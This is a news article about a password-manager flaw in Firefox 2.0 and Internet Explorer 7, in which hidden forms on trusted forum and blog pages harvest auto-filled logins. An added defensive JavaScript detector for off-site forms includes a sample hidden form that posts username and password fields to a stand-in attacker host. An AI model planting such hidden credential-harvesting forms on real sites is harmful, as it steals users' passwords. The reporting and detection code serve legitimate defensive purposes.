TechNewsWorld.com

Firefox, IE Vulnerable to Password Theft


Frequent visitors to blogs and Internet forums may be particularly at risk of identity theft due to an exploit that prompts the Firefox and Internet Explorer password managers to give away their protected information. Both Mozilla and Microsoft have acknowledged the problem and are working on fixes.


A software security researcher has warned that the password manager features of Mozilla's open source Firefox 2.0 and Microsoft's (Nasdaq: MSFT) Internet Explorer (IE) Web browsers could be exploited, placing unsuspecting users at risk.

Users of Firefox or Explorer, both of which may be vulnerable to the attack known as "Reverse Cross Site Request" (RCSR), are not fooled directly by the password theft exploit. Instead, it provides a fake login site that fools a browser's saved password feature into automatically providing the information, Robert Chapin, president of Chapin Information Services, reported.

Neither the latest Firefox 2.0 nor Internet Explorer 7 was designed to check the destination of form data before submission, which leaves both open to the attack.

Because the exploit is actually conducted at a trusted Web site, the user sees a trusted address in the browser bar, according to Chapin.

"Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum Web sites at trusted addresses," Chapin wrote for his security site Chapin Information Services (CIS).

Don't Remember My Password

Both Microsoft and Mozilla acknowledged the issue, with the former referring to an investigation, and the latter, which has a bug report on the issue, advising users to turn off the password manager in Firefox until it is fixed.

The password managers in browsers help millions of Internet users log onto blogging, social networking, Web mail, portal and an array of other sites, and the RCSR vulnerability was reportedly exploited on the popular site MySpace, Chapin said.

The RCSR attack could also be combined with a bogus phishing site to target the attack for more valuable passwords and information, such as online banking, IT-Harvest Chief Research Analyst Richard Stiennon told TechNewsWorld.

"From here on out, best practice is going to be to stop using [password managers]," he said.

Bigger Hole for Firefox

The vast majority of Internet attacks and scams are aimed at Windows users, and while Firefox typically enjoys a security advantage because of its separation from the operating system and faster response to issues, the RCSR is one instance in which the open source browser may be more risky than IE, according to Chapin. He said he reported the issue to Mozilla earlier this month.

While neither browser bolsters password protection for the RCSR scheme, Firefox automatically fills in saved user names and passwords when presented with bogus sign-in forms, Chapin warned.

"This behavior does not occur in Internet Explorer unless the RCSR form appears on the same page as a legitimate login form," he pointed out.

Mozilla, which has displayed the speed and transparency advantages of its open source development for security before, is reportedly working on a fix.

Hidden Danger

The password manager vulnerability is made worse by the fact that the fake sign-in forms can be completely hidden from view, Chapin reported, so a saved password can be transmitted to another site when the user unwittingly clicks an invisible image link.

Chapin recommended changes for both Firefox and Explorer, adding that Webmasters should review server code for the possibility of RCSR and cross-site scripting (XSS) injections, particularly for encrypted sites.

Attacks leveraging the password manager weaknesses could work against firewalled, local network servers and HTTPS addresses that would not otherwise be available, because no direct access or client-side scripting is needed, Chapin said.
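The missing check the article describes, the browser comparing where a form will send its data with the page it sits on, as an added example that is not code from the article, Mozilla or Microsoft; the same function doubles as the webmaster review Chapin recommends, scanning user-submitted HTML for forms that post off-site (function names, sample URLs and the constructed HTML are assumptions).

```javascript
// Added example (not from the article, Mozilla or Microsoft): the destination check
// that Firefox 2.0 and IE 7 reportedly did not perform before auto-filling a form,
// reused as a review script for user-submitted HTML. Names are assumptions.

// Scheme://host[:port] of a URL resolved against a base page, or null if unparsable.
function originOf(href, base) {
  try {
    return new URL(href, base).origin;
  } catch (e) {
    return null;
  }
}

// Auto-fill only when the form will post back to the page's own origin.
// An empty action means "submit to this page" and is allowed; a javascript: or
// data: action (opaque origin, reported as the string "null"), an https->http
// downgrade, or any other host is refused.
function shouldAutofill(pageUrl, formAction) {
  const pageOrigin = originOf(pageUrl);
  if (pageOrigin === null) return false;
  if (!formAction) return true;
  const actionOrigin = originOf(formAction, pageUrl);
  if (actionOrigin === null || actionOrigin === "null") return false;
  return actionOrigin === pageOrigin;
}

// Lists the action of every <form> in an HTML string that would send data off-site.
// A regex is adequate for a review script; a production scanner would use a parser.
function offsiteForms(pageUrl, html) {
  const found = [];
  const formTag = /<form\b[^>]*>/gi;
  let m;
  while ((m = formTag.exec(html)) !== null) {
    const attr = /\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(m[0]);
    const action = attr ? (attr[1] ?? attr[2] ?? attr[3]) : "";
    if (!shouldAutofill(pageUrl, action)) found.push(action);
  }
  return found;
}

// Constructed sample: a forum page on a trusted site where one post embeds a hidden
// form whose action points to a different host (placeholder domain, not a real one).
const SAMPLE_PAGE_URL = "https://forum.example.com/thread/1";
const SAMPLE_HTML = `
<form action="/login" method="post"><input name="user"><input type="password" name="pass"></form>
<div style="display:none"><form action="http://attacker.invalid/collect" method="post">
<input name="user"><input type="password" name="pass"></form></div>`;

console.log(offsiteForms(SAMPLE_PAGE_URL, SAMPLE_HTML)); // [ 'http://attacker.invalid/collect' ]
```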


By Jay Lyman